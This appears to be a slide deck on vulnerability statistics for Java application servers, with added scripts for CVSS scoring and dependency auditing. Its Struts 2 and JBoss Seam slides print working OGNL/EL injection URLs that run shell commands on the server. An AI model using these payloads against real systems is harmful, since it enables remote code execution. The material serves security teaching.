About Me
• Programmer at heart
• Researcher in mind
• Speaker with passion
• Entrepreneur by need
@yonlabs
Agenda
• Motivation and methodology
• Security vulnerabilities
  – Stats and examples
  – App and web servers
  – Web frameworks
• Approach to security
  – What to look for
  – Where to look at
"Hello World in cloud is involve 1 load balancer, 3 web server and 2 database server"
DevOps_Borat, Twitter
Sources
• The National Vulnerability Database
  – NIST Computer Security Division
  – DHS National Cyber Security Division/US CERT
  – http://nvd.nist.gov/
• The Open Source Vulnerability Database
  – Open Security Foundation
  – http://www.osvdb.org/
• The Exploit Database
  – http://www.exploit-db.com/
Common Vulnerability Scoring System v2
• Access Vector: Local / Adjacent network / Remote
• Access Complexity: High / Medium / Low
• Authentication: Multiple instances / Single instance / None
• Confidentiality: None / Partial / Complete
• Integrity: None / Partial / Complete
• Availability: None / Partial / Complete
Vulnerability Types (NVD to CWE Mapping)
• Authentication Issues
• Credentials Management
• Permissions, Privileges, and Access Control
• Buffer Errors
• Cross-Site Request Forgery (CSRF)
• Cross-Site Scripting (XSS)
• Cryptographic Issues
• Path Traversal
• Code Injection
• Format String Vulnerability
• Configuration
• Information Leak/Disclosure
• Input Validation
• Numeric Errors
• OS Command Injections
• Race Condition
• Resource Management Errors
• SQL Injection
• Link Following
• Other
• Not in CWE
• Insufficient Information
• Design Error
App & Web Servers (usage share)
• Tomcat 33%
• JBoss 26%
• WebLogic 10%
• Jetty 8%
• GlassFish 8%
• WebSphere 7%
• Other 8%
Survey by ZeroTurnaround
Number of Vulnerabilities, OSS and Proprietary
• Tomcat 100
• JBoss AS 7
• JBoss EAP 20
• GlassFish 14
• Jetty 20
• WebLogic 185
• WebSphere 201
Based on NVD
Number of Vulnerabilities, OSS vs Proprietary
• OSS (5 platforms): 29%
• Proprietary (2 platforms): 71%
Based on NVD
Vulnerabilities by Year, OSS
[Chart: vulnerabilities per year, 2000 to 2012, y-axis 0 to 20; series: Tomcat, JBoss AS, JBoss EAP, GlassFish, Jetty]
Based on NVD
Vulnerabilities by Year, OSS + Proprietary
[Chart: vulnerabilities per year, y-axis 5 to 50; series: Tomcat, JBoss AS, JBoss EAP, GlassFish, Jetty, WebLogic, WebSphere]
Based on NVD
Vulnerabilities by Year, OSS
[Chart: vulnerabilities per year, 2000 to 2012, y-axis 0 to 30; series: Jetty, GlassFish, JBoss EAP, JBoss AS, Tomcat]
Based on NVD
Vulnerabilities by Year, OSS and Proprietary
[Chart: vulnerabilities per year, 2000 to 2012, y-axis 0 to 90; series: WebSphere, WebLogic, Jetty, GlassFish, JBoss EAP, JBoss AS, Tomcat]
Based on NVD
Vulnerabilities Scoring
[Chart: number of vulnerabilities per server (Tomcat, JBoss AS, JBoss EAP, GlassFish, Jetty, WebLogic, WebSphere) in each CVSS v2 score band]
Bands: LOW [0,4) • MEDIUM [4,7) • HIGH [7,8) • CRITICAL [8,9) • WTF?! [9,10]
Based on NVD
Confidentiality Impact
[Chart: share of vulnerabilities per server with None / Partial / Complete confidentiality impact, 0% to 100%]
Based on NVD
Integrity Impact
[Chart: share of vulnerabilities per server with None / Partial / Complete integrity impact, 0% to 100%]
Based on NVD
Availability Impact
[Chart: share of vulnerabilities per server with None / Partial / Complete availability impact, 0% to 100%]
Based on NVD
Vulnerability Types by Server
[Chart: share of each vulnerability type per server, 0% to 100%; types: Authentication Issues, Credentials Management, Permissions, Privileges, and Access Control, Buffer Errors, CSRF, XSS, Cryptographic Issues, Path Traversal, Code Injection, Configuration, Information Leak, Input Validation, Numeric Errors, Race Condition, Resource Management Errors, SQL Injection, Link Following, Design Error, Unknown]
Based on NVD
Top 3 Vulnerabilities
[Chart: the three most frequent vulnerability types per server (Tomcat, JBoss AS, JBoss EAP, GlassFish, Jetty, WebLogic, WebSphere); types shown: Credentials Management, Permissions…, CSRF, XSS, Path Traversal, Information Leak, Input Validation]
Based on NVD
3 and More Vulnerabilities
[Chart: vulnerability types with three or more entries per server (Tomcat, JBoss AS, JBoss EAP, GlassFish, Jetty, WebLogic, WebSphere); types shown: Authentication Issues, Credentials Management, Permissions…, CSRF, XSS, Cryptographic Issues, Path Traversal, Configuration, Information Leak, Input Validation, Resource Management Errors, Design Error]
Based on NVD
Total Vulnerabilities by Type
[Chart: total vulnerabilities per type across WebSphere, WebLogic, Jetty, GlassFish, JBoss EAP, JBoss AS and Tomcat, y-axis 0 to 60; types in chart order: Cross-Site Scripting (XSS); Permissions, Privileges, …; Information Leak; Input Validation; Resource Management …; Design Error; Cryptographic Issues; Path Traversal; Authentication Issues; Credentials Management; Cross-Site Request …; Configuration; Buffer Errors; Code Injection; Numeric Errors; Race Condition; Link Following; SQL Injection]
Based on NVD
Max CVSS v2: 10
• CVE-2011-0807
• 20-04-2011
• Unspecified vulnerability in Oracle Sun GlassFish Enterprise Server 2.1, 2.1.1, and 3.0.1, and Sun Java System Application Server 9.1, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Administration.
• AV: Network • AC: Low • Au: None required • C: Complete • I: Complete • A: Complete
• Insufficient information
Min CVSS v2: 1.2
• CVE-2010-3718
• 2/10/11
• Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
• AV: Local access • AC: High • Au: None required • C: None • I: Partial • A: None
• Design Error
CVE-2010-1870 exploit (Struts2)
• Found by and exploit shown by Meder Kydyraliev
• Based on his previous bug: XW-641
  – ('\u0023' + 'session[\'user\']')(unused)=0wn3d
  – #session['user']=0wn3d
  – ActionContext.getContext().getSession().put("user", "0wn3d")
  – ParametersInterceptor blacklists # to prevent tampering with server-side data
CVE-2010-1870: Struts 2
• 8/17/10
• The OGNL extensive expression evaluation capability in XWork in Struts 2.0.0 through 2.1.8.1, as used in Atlassian Fisheye, Crucible, and possibly other products, uses a permissive whitelist, which allows remote attackers to modify server-side context objects and bypass the # protection mechanism in ParameterInterceptors via the (1) #context, (2) #_memberAccess, (3) #root, (4) #this, (5) #_typeResolver, (6) #_classResolver, (7) #_traceEvaluations, (8) #_lastEvaluation, (9) #_keepLastEvaluation, and possibly other OGNL context variables, a different vulnerability
• AV: Network • AC: Low • Au: None required • C: None • I: Partial • A: None
• Design Error (NVD-CWE-DesignError)
CVE-2010-1870 exploit
• Guards:
  – xwork.MethodAccessor.denyMethodExecution
  – #_memberAccess.allowStaticAccess
• Exploit by Meder Kydyraliev
  – #_memberAccess['allowStaticMethodAccess'] = true
  – #foo = new java.lang.Boolean("false")
  – #context['xwork.MethodAccessor.denyMethodExecution'] = #foo
  – #rt = @java.lang.Runtime@getRuntime()
  – #rt.exec("touch /tmp/dir", null)
/HelloWorld.action?('\u0023_memberAccess [\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context
[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo') (\u0023foo\u003dnew%20java.lang.Boolean("false")))&(ssss)((\u0023r
t\ ('mkdir\u0020/tmp/PWNED'\u002cnull)))=1
CVE-2010-1871: JBoss Seam
• 08/05/2010
• JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.
• 6.8 • (AV:N/AC:M/Au:N/C:P/I:P/A:P) • Input Validation
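The CVSS v2 slide lists the six base metrics and the CVE slides give each issue as a vector plus a score. The following calculator is an added example and not part of the deck: it turns a v2 vector string into the base score using the weights from the CVSS v2 specification, buckets it into the deck's own severity bands, and tallies per product the way the "Vulnerabilities Scoring" chart does. The product labels attached to the four slide vectors are my own; the vectors and scores are the slide's.

```python
"""CVSS v2 base score from a vector string, plus the deck's severity bands.

Added example, not code from the slides. Weights are the published CVSS v2
base-metric weights; the bands are the labels used on the scoring slide.
"""

# CVSS v2 base-metric weights (from the CVSS v2 specification).
ACCESS_VECTOR = {"L": 0.395, "A": 0.646, "N": 1.0}      # Local / Adjacent / Network
ACCESS_COMPLEXITY = {"H": 0.35, "M": 0.61, "L": 0.71}   # High / Medium / Low
AUTHENTICATION = {"M": 0.45, "S": 0.56, "N": 0.704}     # Multiple / Single / None
IMPACT_WEIGHT = {"N": 0.0, "P": 0.275, "C": 0.660}      # None / Partial / Complete

# Severity bands as labelled on the "Vulnerabilities Scoring" slide; the top
# band is closed at 10.0 so a maximum score is bucketed as well.
BANDS = [
    (0.0, 4.0, "LOW"),
    (4.0, 7.0, "MEDIUM"),
    (7.0, 8.0, "HIGH"),
    (8.0, 9.0, "CRITICAL"),
    (9.0, 10.0, "WTF?!"),
]

REQUIRED_METRICS = ("AV", "AC", "Au", "C", "I", "A")


def parse_vector(vector):
    """Turn 'AV:N/AC:M/Au:N/C:P/I:P/A:P' (optionally in parentheses) into a dict."""
    metrics = {}
    for part in vector.strip().strip("()").split("/"):
        name, sep, value = part.partition(":")
        if not sep:
            raise ValueError(f"malformed metric {part!r} in {vector!r}")
        metrics[name] = value
    missing = [m for m in REQUIRED_METRICS if m not in metrics]
    if missing:
        raise ValueError(f"vector {vector!r} lacks metrics {missing}")
    return metrics


def base_score(vector):
    """CVSS v2 base score, rounded to one decimal as the specification requires."""
    m = parse_vector(vector)
    impact = 10.41 * (1 - (1 - IMPACT_WEIGHT[m["C"]])
                         * (1 - IMPACT_WEIGHT[m["I"]])
                         * (1 - IMPACT_WEIGHT[m["A"]]))
    exploitability = (20 * ACCESS_VECTOR[m["AV"]]
                      * ACCESS_COMPLEXITY[m["AC"]] * AUTHENTICATION[m["Au"]])
    f_impact = 0.0 if impact == 0 else 1.176  # no impact at all scores 0
    return round((0.6 * impact + 0.4 * exploitability - 1.5) * f_impact, 1)


def severity(score):
    """Map a base score onto the slide's bands."""
    for low, high, label in BANDS:
        if low <= score < high or (score == high == 10.0):
            return label
    raise ValueError(f"score {score} outside [0, 10]")


def tally_by_severity(records):
    """records: iterable of (product, vector). Returns {product: {band: count}}."""
    counts = {}
    for product, vector in records:
        band = severity(base_score(vector))
        per_product = counts.setdefault(product, {})
        per_product[band] = per_product.get(band, 0) + 1
    return counts


# Vectors copied from the CVE slides; the product labels are assumed by me.
SLIDE_RECORDS = [
    ("GlassFish", "AV:N/AC:L/Au:N/C:C/I:C/A:C"),      # CVE-2011-0807, slide says 10
    ("Tomcat", "AV:L/AC:H/Au:N/C:N/I:P/A:N"),         # CVE-2010-3718, slide says 1.2
    ("Struts 2", "AV:N/AC:L/Au:N/C:N/I:P/A:N"),       # CVE-2010-1870
    ("JBoss Seam", "(AV:N/AC:M/Au:N/C:P/I:P/A:P)"),   # CVE-2010-1871, slide says 6.8
]

if __name__ == "__main__":
    for product, vector in SLIDE_RECORDS:
        score = base_score(vector)
        print(f"{product:<11} {vector:<30} {score:>4}  {severity(score)}")
    print(tally_by_severity(SLIDE_RECORDS))
```

Running it reproduces the 10, 1.2 and 6.8 from the slides and gives 5.0 for the Struts vector; note how two issues with identical Integrity-only impact (the Tomcat and Struts vectors) land in different bands purely on Access Vector and Access Complexity.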
CVE-2010-1871 exploit
• Found by and exploit provided by Meder Kydyraliev
/seam-booking/home.seam?actionOutcome=/pwn.xht
ml?pwned%3d%23 {expressions.getClass().forName
('java.lang.Runtime').getDeclaredMethods()[19].invoke
(expressions.getClass().forName('java.lang.R untime').getDeclaredMethods()[7].invoke(null),
'mkdir /tmp/ PWNED')}
Culture
"The best indicator of the library's future security is a culture that places value on security and clear evidence of broad and rigorous security analysis."
Jeff Williams, CEO, Aspect Security
What to Look For?
• Known security vulnerabilities in an OSS library and trends
• Library complexity, its design and its dependencies
• Security in the software development process of an OSS library
  – Security during development
    • Security built into the development process
  – Security during issue handling
    • Clear and transparent issue handling
    • Undisclosed details until fixed
    • Security response team
    • Security bulletins
    • Releases and release notes containing security information
Where to Look At?
• Vulnerability databases
  – Open Source Vulnerability Database
  – National Vulnerability Database
  – Exploit Database
• Vendor site
  – Development process
  – Issue tracker
  – Security bulletins
  – Release notes
• Dependency hell
  – Use the support of a dependency management tool (e.g. update reports in Maven)
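The "what to look for" and "where to look at" lists boil down to one routine check: compare the libraries a project actually pulls in against the vulnerability databases. The script below is an added example, not tooling from the deck or from Maven: it reads dependencies from a constructed pom.xml and flags any whose version falls inside a known affected range. The Struts range copies the slide's "2.0.0 through 2.1.8.1" for CVE-2010-1870; the second advisory is a placeholder with made-up coordinates and range, and the version ordering is a simplification of Maven's.

```python
"""Flag Maven dependencies that fall inside a known-vulnerable version range.

Added example, not from the slides. The pom fragment and the advisory list are
constructed here; in practice the advisory list would come from NVD/OSVDB
exports or the vendor's security bulletins.
"""
import re
import xml.etree.ElementTree as ET

POM_NS = {"m": "http://maven.apache.org/POM/4.0.0"}

# Constructed pom.xml for the demonstration.
POM_XML = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <dependencies>
    <dependency>
      <groupId>org.apache.struts</groupId>
      <artifactId>struts2-core</artifactId>
      <version>2.1.8.1</version>
    </dependency>
    <dependency>
      <groupId>org.jboss.seam</groupId>
      <artifactId>jboss-seam</artifactId>
      <version>2.2.0.GA</version>
    </dependency>
    <dependency>
      <groupId>junit</groupId>
      <artifactId>junit</artifactId>
      <version>4.8.2</version>
    </dependency>
  </dependencies>
</project>
"""

# Constructed advisory records: (id, groupId, artifactId, first affected, last affected).
# The Struts range is the slide's "2.0.0 through 2.1.8.1"; the second row is a placeholder.
ADVISORIES = [
    ("CVE-2010-1870", "org.apache.struts", "struts2-core", "2.0.0", "2.1.8.1"),
    ("ADV-PLACEHOLDER-1", "org.jboss.seam", "jboss-seam", "2.0.0", "2.1.2"),
]


def parse_version(version):
    """Split '2.1.8.1' or '2.2.0.GA' into comparable tokens.

    Numeric tokens compare as integers and sort before alphabetic ones; this is
    a simplification of Maven's full version ordering, adequate for dotted
    release numbers with a trailing qualifier.
    """
    tokens = []
    for piece in re.split(r"[.\-]", version.strip()):
        tokens.append((0, int(piece)) if piece.isdigit() else (1, piece.lower()))
    return tuple(tokens)


def in_affected_range(version, first, last):
    """True when first <= version <= last under parse_version ordering."""
    v = parse_version(version)
    return parse_version(first) <= v <= parse_version(last)


def load_dependencies(pom_xml):
    """Return [(groupId, artifactId, version)] from a pom.xml string."""
    root = ET.fromstring(pom_xml)
    deps = []
    for dep in root.findall("m:dependencies/m:dependency", POM_NS):
        fields = []
        for tag in ("groupId", "artifactId", "version"):
            node = dep.find(f"m:{tag}", POM_NS)
            fields.append(node.text.strip() if node is not None and node.text else "")
        deps.append(tuple(fields))
    return deps


def audit(pom_xml, advisories=ADVISORIES):
    """Return (advisory id, groupId:artifactId, version) for every matching dependency."""
    findings = []
    for group, artifact, version in load_dependencies(pom_xml):
        if not version:
            continue  # version inherited from a parent or BOM; resolve it first
        for adv_id, adv_group, adv_artifact, first, last in advisories:
            if (group, artifact) == (adv_group, adv_artifact) and \
                    in_affected_range(version, first, last):
                findings.append((adv_id, f"{group}:{artifact}", version))
    return findings


if __name__ == "__main__":
    for adv_id, coordinate, version in audit(POM_XML):
        print(f"{coordinate} {version} is affected by {adv_id}")
```

A check like this only sees direct dependencies; transitive ones are exactly the "dependency hell" the slide mentions, so in a real build it belongs on the resolved dependency tree rather than on the pom alone.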